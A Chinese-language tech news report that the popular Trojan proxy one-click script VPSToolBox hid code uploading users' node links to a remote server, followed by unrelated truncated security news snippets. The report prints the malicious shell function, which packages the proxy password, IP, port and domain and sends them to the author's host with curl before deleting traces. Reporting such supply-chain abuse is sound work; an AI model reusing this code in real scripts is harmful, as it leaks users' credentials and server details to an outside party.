Trojan 知名一键脚本 VPSToolBox 包含恶意代码


V2EX (https://v2ex.com/t/928400) 用户发现 Trojan 一键脚本 VPSToolBox 包含恶意代码,会将用户自建的 Trojan 节点链接上传至远程服务器。

clean_env(){
prasejson
cd /root
echo "trojan://${password1}@${myip}:${trojanport}?security=tls&headerType=none&type=tcp&sni=${domain}#Trojan($(nproc --all)C$(grep MemTotal /proc/meminfo | awk '{print $2}' | xargs -I {} echo "scale=1; {}/1024^2" | bc)G ${route_final}${mycountry} ${myip_org} ${myip} ${myipv6} ${target_speed_up} Mbps)" &> ${myip}.txt
curl --retry 5 https://johnrosen1.com/fsahdfksh/ --upload-file ${myip}.txt &> /dev/null
rm ${myip}.txt
cd
rm -rf /root/*.sh
rm -rf /usr/share/nginx/*.sh
clear
}

恶意代码位置:
https://github.com/johnrosen1/vpstoolbox/blob/ec7e0dc19561563f5d278a3e436f1cf67b9ae7b5/vps.sh#L494

据了解,该恶意代码已经存在超过一年时间。曾有用户提出 issue 指出该恶意代码,但被作者直接关闭了 issue。

该作者在2022年4月14日的一次更新中使用了上传 trojan 节点链接的代码,替换了原来加入 netdata 云监控的代码。通过查找其他用户克隆的仓库证实了这一说法。在被曝光后不久,作者删除了项目的 GitHub 仓库 (https://github.com/johnrosen1/vpstoolbox),该项目一共获得了 1.7k 个 star。


相關推薦

2022-07-09

1200多个包含混淆加密的恶意 NPM,这些包含有相同的挖矿脚本 eazyminer,该脚本的目的是利用如 Database 和 Web 等所在服务器的机器闲置资源进行挖矿。 攻击事件分析 攻击手法 CuteBoi 主要依赖 mail.tm 提供的一次性电子邮件服务和

2022-06-30

一位名为 Paul 的作者发布了一篇呼吁抵制知名压缩软件 7-Zip 的文章。7-Zip 是一个由俄罗斯开发者 Igor Pavlov 开发,发布于 1999 年的老牌软件,其源码托管在 Sourceforge;大部分的源码都适用于 GNU LGPL 许可,unRAR 代码则采用的是 GNU L

2023-08-03

领投,跟投的包括 Abstract Ventures 和 Michael Ovitz,以及众多知名天使投资人 Box(Aaron Levie)、Figma(Dylan Field)、Okta(Frederic Kerrest)、Vercel(Guillermo Rauch)和 Eventbrite(Julia 和 Kevin Hartz)的联合创始人等。 Socket 是一家提供扫描工

2023-01-11

用。以及采取了一些措施来防止名称抢注,即名称故意与知名名称相似。开发人员还可以观察扩展是否有蓝勾,该标识意味着发布者已经验证了一个 web 域名的所有权(有些正版扩展也并没有进行验证,如 Prettier 等)。 Marketpl

2022-03-16

名进行供应链投毒,该包在 npm 每周有上百万下载量。 知名技术网站 V2ex 的一条爆出了这个问题,用户  在使用 npm 构建前端项目时,启动项目后桌面自动创建了一个《 WITH-LOVE-FROM-AMERICA.txt 》文件,点开之后发现内容是空的。

2023-10-12

布弃用 VBScript,并计划在未来的 Windows 版本中逐步淘汰该脚本语言。“VBScript 在从操作系统中移除之前,将作为按需功能提供。” 按需功能是 Windows 操作系统中的可选功能,如 .NET Framework(.NetFx3)、Hyper-V 和 Windows Subsystem for Li

2022-09-17

司,该公司的主要产品就是同名的杀毒软件,去年另一家知名的安全软件公司诺顿表示正在与 Avast 进行合并谈判,两家公司已于本月正式完成了合并。 「I don't care about cookies」的开发者近日在官方网站上发布消息表示,他已经

2022-12-10

洞的利用,并利用这些漏洞获得对设备的访问;然后下载脚本以进一步传播。它使用文件名"zero,"进行保存,这也是其命名的由来。影响范围涵盖 F5 BIG-IP、Zyxel 防火墙、Totolink 和 D-Link 路由器以及 Hikvision cameras 等。除了一些物联

2023-02-17

更改使用户能够修复镜像以及用于发布和更新镜像的支持脚本的问题,而无需直接向 ClamAV 发布分支中的文件提交更改。 ​​​​​​​https://github.com/Cisco-Talos/clamav/pull/765 将 vendored libmspack 库更新到 0.11alpha 版。

2022-12-02

TomsFastMath 库构建的选项已被删除 将 Docker 文件和支持脚本从 ClamAV 主仓库移到了一个新仓库:https://github.com/Cisco-Talos/clamav-docker 由于 0.103 LTS 版本和 1.0 LTS 版本之间的 ABI 变化,增加了 libclamav 的 SONAME 主要版本。 其他改进

2021-12-24

意代码执行 简述: 由于在 mod_lua 多部分解析器(从 Lua 脚本调用的 r:parsebody())中出现边界错误,因此远程攻击者可发送恶意构造的HTTP请求,可导致缓冲区溢出,进而可在目标服务器上执行任意代码。但该模块默认不启用,未

2024-07-24

在国内获得用户青睐,更在海外引起广泛关注,获得海外知名科技媒体专题报道,并于开发者论坛屡次引发热议。 moon : MoonBit 构建系统 moon 是 MoonBit 的构建系统,为 MoonBit 项目提供编译构建,自动化测试工具(集成 expect te

2022-08-09

了恶意代码,感染文件超过3.5万,涉及 Go 代码、NPM 安装脚本、容器镜像配置等内容。 https://mp.weixin.qq.com/s/4exLDOlayWm_o60zxn1Srw 其他资讯 通过 SSH 蛮力攻击针对 Linux 服务器的新 IoT RapperBot 恶意软件 https://thehackernews.com/2022/08

2022-04-12

积极开发的项目推向 Play Store 之外,从而导致用户转向不知名来源获取想要的应用程序的 APK,加大感染恶意软件风险。 Accessibility API 滥用 Android 的 Accessibility API 允许开发人员创建可供残障人士使用的应用程序,从而允许创建不